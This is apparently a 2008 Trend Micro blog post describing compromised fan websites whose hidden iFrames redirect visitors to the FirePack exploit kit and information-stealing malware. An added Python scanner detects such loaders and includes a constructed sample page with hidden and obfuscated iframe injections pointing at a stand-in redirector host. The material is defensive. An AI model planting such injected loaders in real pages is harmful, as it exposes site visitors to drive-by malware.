    Whoa is my Jets, but not only the team, but one of their fansites, and several other unrelated Web sites, too.

    It leads to a redirect in Estonia, which in turn leads to an exploit server in New York. Go figure.

    Here is yet another example of criminals taking advantage of, and compromising popular Web sites to further their criminal activities.

    There are several Web sites that we have detected which have the exact same embedded iFrame(s) that may surreptitiously download malware to a vulnerable computer, but this one stood out above all others — due to my devotion to the New York Jets, of course.

    Ironically, they’re located in the United States, too.

    A “new” server-side malware toolkit has surfaced called “FirePack”, which is a play on the wording of previous malware-service toolkits (e.g. MPack, IcePack).

    And yes, they actively exploit unwary visitors — or rather, visitors are surreptitiously “piped” malicious content via the iFrame.

    We’ll post more on FirePack later, but in the meantime, we’re taking measures to secure our customers against these threats.

    In the meantime, don’t visit newyorkfanatic(dot)com.

    More later — watch this space.

    Updated: 4 January 2008, 19:30 PST

    As promised, we’d like to provide a little more information on this nastiness.

    Here’s a basic rundown of the infection chain, as depicted in the image above.

    Users surfing to a compromised website that contains a malicious embedded iFrame (or an obfuscated JavaScript iFrame) set in motion a chain of very unfortunate events.

    First, the iFrame (or an obfuscated JavaScript iFrame) contains a redirect to another Web site hosting the FirePack infection engine (we have also seen it loop through an intermediary redirect first), which then checks which browser (MS-IE/Firefox/Opera) the unwitting user is running.

    The FirePack kit also hosts a lot of exploits, targeting specific vulnerabilities including (but not limited to):

    – Vulnerability in Microsoft XML Core Services Allows Remote Code Execution (MS06-071)
    – Yahoo Webcam vulnerability
    – Microsoft Internet Explorer CreateTextRange Remote Code Execution Vulnerability (MS06-13)
    – Windows Media Player Plug-In EMBED Overflow Universal Exploit (MS06-006)
    – Vulnerability in Vector Markup Language Could Allow Remote Code Execution (MS07-004)
    – Also, an Opera 0day 9.0-9.2 vulnerability released in October 2007!

    If any of the FirePack vulnerabilities are found, this leads to vulnerable users having some very nasty malware downloaded (and executed) to their systems. This malware creates one of the infamous NTOS.exe or WSNPOEM variants in the infected system — and their purpose is but for one reason, and one reason only: information theft.
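As an added illustration (not code from the original post or from Trend Micro), here is a small Python scanner for the first link in that chain: it flags iFrames in a fetched page that point off-site, are zero-sized or CSS-hidden, or are only written out by a document.write(unescape("...")) obfuscation. The host names and the sample page are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
ESCAPED_LITERAL = re.compile(r"""["']([^"']*%3[cC][^"']*)["']""")  # "%3Ciframe..." literals

class IframeScanner(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host, self.in_script = page_host.lower(), False
        self.escaped_literals, self.findings = [], []   # findings: (src, [reasons])

    def handle_starttag(self, tag, attrs):
        tag = tag.lower()
        self.in_script = self.in_script or tag == "script"
        if tag != "iframe": return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        src_host = urlparse(a.get("src", "")).hostname
        if src_host and src_host.lower() != self.page_host:
            reasons.append("off-site src " + src_host)   # loader points at a third-party host
        if any(a.get(d, "").strip().rstrip("px") in ("0", "1") for d in ("width", "height")):
            reasons.append("zero-size frame")            # invisible to the visitor
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden by CSS")
        if reasons: self.findings.append((a.get("src", ""), reasons))

    def handle_endtag(self, tag):
        self.in_script = self.in_script and tag.lower() != "script"

    def handle_data(self, data):
        if self.in_script:   # keep script strings that might unescape() to an <iframe>
            self.escaped_literals += ESCAPED_LITERAL.findall(data)

def scan_html(html, page_host):
    """Return (src, reasons) for every iframe in the page that looks like an injected loader."""
    p = IframeScanner(page_host)
    p.feed(html)
    for literal in p.escaped_literals:   # second pass: decode document.write(unescape("..."))
        p.feed(unquote(literal))
    return p.findings

SAMPLE = """<html><body><h1>Fan site</h1>
<iframe src="http://fansite.example/scores.html" width="400" height="300"></iframe>
<iframe src="http://redirector.example/in.cgi?a" style="visibility:hidden"></iframe>
<script>document.write(unescape("%3Ciframe src=%22http://redirector.example/in.cgi?b%22 width=0 height=0%3E%3C/iframe%3E"));</script>
</body></html>"""  # constructed sample: one legitimate embed, one CSS-hidden and one obfuscated loader

if __name__ == "__main__":
    for src, why in scan_html(SAMPLE, "fansite.example"): print(src, "->", ", ".join(why))
```

The legitimate same-host embed is not reported; the two loaders are, each with the reasons that tripped it.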

    Game over.

    The most important note here is one I like to make when the occasion presents itself, and that is why we (Trend Micro) have stepped up our efforts and focus on Web Threat Protection (WTP).

    At the time of initial exploit, some of this new malware can be completely undetectable — and of course, the time to implement new detection on the malware itself can be anywhere from hours to days. With our WTP efforts, we can quickly identify threats on the Internet, classify them, and integrate them into our WTP databases, so that our customers are alerted that a Web site they might be surfing is dangerous.

    Let’s be careful out there!

    Paul “Fergie” Ferguson and Ivan Macalintal
    Network Security Intelligence
    Advanced Threats Research
